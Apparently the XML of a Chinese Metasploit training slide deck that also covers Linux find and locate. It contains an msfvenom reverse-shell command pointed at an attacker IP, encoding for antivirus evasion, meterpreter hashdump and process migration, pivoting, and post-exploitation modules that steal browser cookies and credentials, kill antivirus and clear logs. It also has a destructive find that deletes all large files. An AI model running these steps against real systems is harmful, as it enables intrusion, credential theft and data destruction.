                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ，最后攻击者接收 shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="19191C"/>
              </a:solidFill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7765" y="2587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3281680"/>
            <a:ext cx="9982200" cy="10858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msf-msfvenom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540" y="1283970"/>
            <a:ext cx="8851265" cy="413385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Msfvenom 是有效负载生成和编码的组合。它于 2015 年 6 月 8 日取代了 msfpayload 和 msfencode。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sz="1600" b="0" i="0"/>
              <a:t>要生成有效负载，您必须提供两个标志（-p 和 -f）：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-p 标志：指定要生成的有效负载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457200" lvl="1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要查看 Framework 提供哪些有效负载，您可以执行以下操作： ./msfvenom -l payloads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457200" lvl="1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-p 标志还支持“-”作为接受自定义负载的方式： cat payload_file.bin | ./msfvenom -p </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> -a x86 --platform win -e x86/shikata_ga_nai -f raw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-f 标志： 指定有效负载的格式 ./msfvenom -p windows/meterpreter/bind_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f exe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457200" lvl="1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要查看支持哪些格式，您可以执行以下操作来了解： ./msfvenom --help-formats</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1167765" y="2587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7395" y="5689600"/>
            <a:ext cx="943673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msfvenom -p windows/meterpreter/reverse_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>=[Attacker's IP] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>=4444 -f exe -o /tmp/my_payload.exe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msf-msfvenom-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码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540" y="1283970"/>
            <a:ext cx="10841990" cy="230505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默认情况下，当使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> 标志（</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badchar</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> 标志）时，编码功能将自动启动。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sz="1600" b="0" i="0"/>
              <a:t>在其他情况下，必须使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> 标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0" i="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> msfvenom -p windows/meterpreter/bind_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> x86/shikata_ga_nai -f raw</a:t>
            </a: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sz="1600" b="0" i="0"/>
              <a:t>列出可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0" i="0"/>
              <a:t>编码器：msfvenom -l encoders</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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zh-CN" sz="1600" b="0" i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sz="1600" b="0" i="0"/>
              <a:t>可以使用 -i 标志对有效负载进行多次编码 。有时更多的迭代可能有助于避免防病毒，但编码并不是真正的反病毒规避解决方案： msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1600" b="0" i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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit-rank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3380" y="1283970"/>
            <a:ext cx="10841990" cy="56769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sz="1600" b="0" i="0"/>
              <a:t>每个漏洞利用模块都根据其对目标系统的潜在影响分配了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t>。用户可以根据排名对漏洞进行搜索、分类和优先排序</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i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908050" y="1969135"/>
          <a:ext cx="10010140" cy="475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115"/>
                <a:gridCol w="680402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Ranking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+mn-ea"/>
                        </a:rPr>
                        <a:t>Desc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN">
                        <a:latin typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="0"/>
                </a:tc>
              </a:tr>
              <a:tr h="67945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Excellent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该漏洞永远不会使服务崩溃。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SQL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注入、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CMD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执行、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RFI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、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LFI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等就是这种情况。除非有特殊情况（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WMF Escape()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），否则不应给予典型的内存损坏利用此排名。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62992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Great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</a:rPr>
                        <a:t>该漏洞利用有一个默认目标，并且会</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>自动检测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</a:rPr>
                        <a:t>适当的目标或在版本检查后使用特定于应用程序的返回地址。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67945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Good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该漏洞利用有一个默认目标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, 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漏洞利用不会自动检测目标。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62992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Normal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该漏洞在其他方面是可靠的，但取决于特定版本，无法（或不）可靠地自动检测。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50800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Average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该漏洞利用一般不可靠或难以利用，但对于常见平台来说成功率在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50%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以上。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41656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Low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对于常见平台，该漏洞几乎不可能被利用（成功率低于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50%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）。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  <a:tr h="843280"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</a:rPr>
                        <a:t>Manual Ranking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="19191C"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101917" marR="101917" marT="101917" marB="101917" anchor="ctr" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="0" indent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该漏洞利用不稳定或难以利用，基本上是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DoS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（成功率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15%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或更低）。当模块没有用处时也使用此排名，除非用户专门配置（例如： </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN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exploit/unix/webapp/php_eval </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="19191C"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:cs typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="19191C"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:cs typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101917" marR="101917" marT="101917" marB="101917" anchor="ctr" anchorCtr="0"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常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令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540" y="1153795"/>
            <a:ext cx="10841990" cy="5245735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help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bg / background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tab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键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+mn-ea"/>
              </a:rPr>
              <a:t>自动补全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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sessions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jobs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getuid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getsid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getpid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getsystem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sysinfo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netstat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ps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ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea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shell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execute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screenshot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screenshare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migrate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run  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>运行脚本或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load  //load kiwi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hashdump</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i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msf-exploit-meterpreter-migrate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45" y="1203325"/>
            <a:ext cx="10841990" cy="353568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migrate用于将 Meterpreter 会话迁移到目标系统上的另一个进程。这样做的好处是可以提高会话的稳定性和隐蔽性，因为新进程可能更稳定，且不太可能被用户或其他程序关闭。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以下是使用 msf migrate 命令的基本步骤：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</a:rPr>
              <a:t>首先，你需要有一个 Meterpreter 会话。这通常是通过利用目标系统的某个漏洞来实现的。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</a:rPr>
              <a:t>一旦你获得了 Meterpreter 会话，你可以使用 ps 命令来列出目标系统上当前运行的所有进程。这有助于你选择一个合适的进程来迁移你的会话。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</a:rPr>
              <a:t>使用 getpid 命令来查看当前 Meterpreter 会话的进程 ID。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</a:rPr>
              <a:t>选择一个稳定的进程，比如 explorer.exe 或 winlogon.exe，然后使用 migrate 命令加上进程 ID 来迁移你的会话。例如，如果你选择了一个进程 ID 为 1416 的进程，你可以输入 migrate 1416 来迁移你的会话。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 i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>迁移完成后，你可以使用 getpid 命令再次检查，确认你的会话已经迁移到了新的进程。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如果你遇到问题，比如迁移后会话断开，可以尝试使用自动迁移进程命令 run post/windows/manage/migrate，这将让系统自动寻找合适的进程进行迁移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。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i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5060950"/>
            <a:ext cx="6858000" cy="129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4739005"/>
            <a:ext cx="6457950" cy="16954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流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓发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45" y="1203325"/>
            <a:ext cx="10841990" cy="1116965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portfwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>转发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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portfwd add -l 3389 -p 3389 -r 192.168.38.129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portfwd flush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portfwd list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3079115"/>
            <a:ext cx="7442200" cy="2343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95" y="2081530"/>
            <a:ext cx="4343400" cy="41656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流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓发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45" y="1203325"/>
            <a:ext cx="10841990" cy="115443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post/multi/manage/autoroute //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动路由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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>route add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.38.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 255.255.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.0 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>手动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>添加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route flush //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由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route get 192.168.38.129  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检查路由是否使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i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2543175"/>
            <a:ext cx="8910955" cy="35344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流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓发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1810" y="1203325"/>
            <a:ext cx="10841990" cy="161798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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代理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45720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 i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auxiliary/server/socks_proxy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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxychains-ng //kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自带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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxychains-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对工具进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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655" y="3689350"/>
            <a:ext cx="4133850" cy="1562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3429000"/>
            <a:ext cx="6038850" cy="25590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流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓发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853690"/>
            <a:ext cx="7796530" cy="2225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" y="1522095"/>
            <a:ext cx="5613400" cy="110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" y="5418455"/>
            <a:ext cx="9544050" cy="11684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-find-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据大小查找文件和目录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solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找50MB的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 / -size 50M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i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找大小在50MB到100MB之间的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>find / -size +50M  -size -100M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sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找并删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>100MB的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     find / -size +100M -exec rm -rf {} \;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-2857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i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找特定文件并删除   find / -type f -name *.mp3 -size +10M -exec rm {} \;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i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后渗透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45" y="1203325"/>
            <a:ext cx="10841990" cy="4567555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信息收集模块：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post/windows/gather/forensics/enum_drives：获取目标机器的分区情况。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post/windows/gather/checkvm：判断目标机是否为虚拟机。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post/windows/gather/enum_services：查看目标机开启哪些服务。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post/windows/gather/enum_applications：查看目标机安装了哪些应用、补丁。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post/windows/gather/dumplinks：查看目标机最近的操作。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提权模块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post/multi/recon/local_exploit_suggester：检测目标系统补丁然后会给出相应exp提权的功能。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浏览器相关模块：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post/firefox/gather/cookies：从Firefox Privileged Javascript Shell收集cookies。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post/multi/gather/firefox_creds：收集系统中Firefox浏览器的凭证和cookies。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post/multi/gather/chrome_cookies：读取目标用户默认Chrome配置文件中的所有cookies。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post/windows/gather/enum_ie：收集Internet Explorer的用户数据，包括历史记录、cookies和凭证。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i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msf-exploit-meterpreter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后渗透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45" y="1203325"/>
            <a:ext cx="10841990" cy="3164840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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persistence：建立持久性会话。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clearev：清除日志。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post/windows/manage/migrate：自动进程迁移。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post/windows/gather/checkvm：查看目标主机是否运行在虚拟机上。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post/windows/manage/killav：关闭杀毒软件。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post/windows/manage/enable_rdp：开启远程桌面服务。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post/windows/manage/autoroute：查看路由信息。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post/windows/gather/enum_logged_on_users：列举当前登录的用户。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post/windows/gather/enum_applications：列举应用程序。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windows/gather/credentials/windows_autologin：抓取自动登录的用户名和密码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1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600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run windows/gather/smart_hashdump：dump出所有用户的hash。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i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9"/>
          <p:cNvSpPr/>
          <p:nvPr/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4839550" y="1381374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392112"/>
            <a:ext cx="3203932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25000"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96598" y="3226065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484870" y="1668780"/>
            <a:ext cx="35280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传承高铁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守护天机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54072" y="4672364"/>
            <a:ext cx="323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河北中车数智科技有限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基础命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>locate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640" y="1551940"/>
            <a:ext cx="11031220" cy="44265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i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>locate命令的功能是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快速查找文件或目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。与find命令进行全局搜索不同，locate命令是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于数据文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（/var/lib/locatedb）进行的定点查找，由于缩小了搜索范围，因此速度快很多。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语法格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：locate 参数 文件名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>更新数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
              <a:latin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34035" y="3479800"/>
          <a:ext cx="1030351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970"/>
                <a:gridCol w="3223260"/>
                <a:gridCol w="2066925"/>
                <a:gridCol w="334835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参数名称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描述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600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b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匹配文件名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w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匹配完整的文件</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
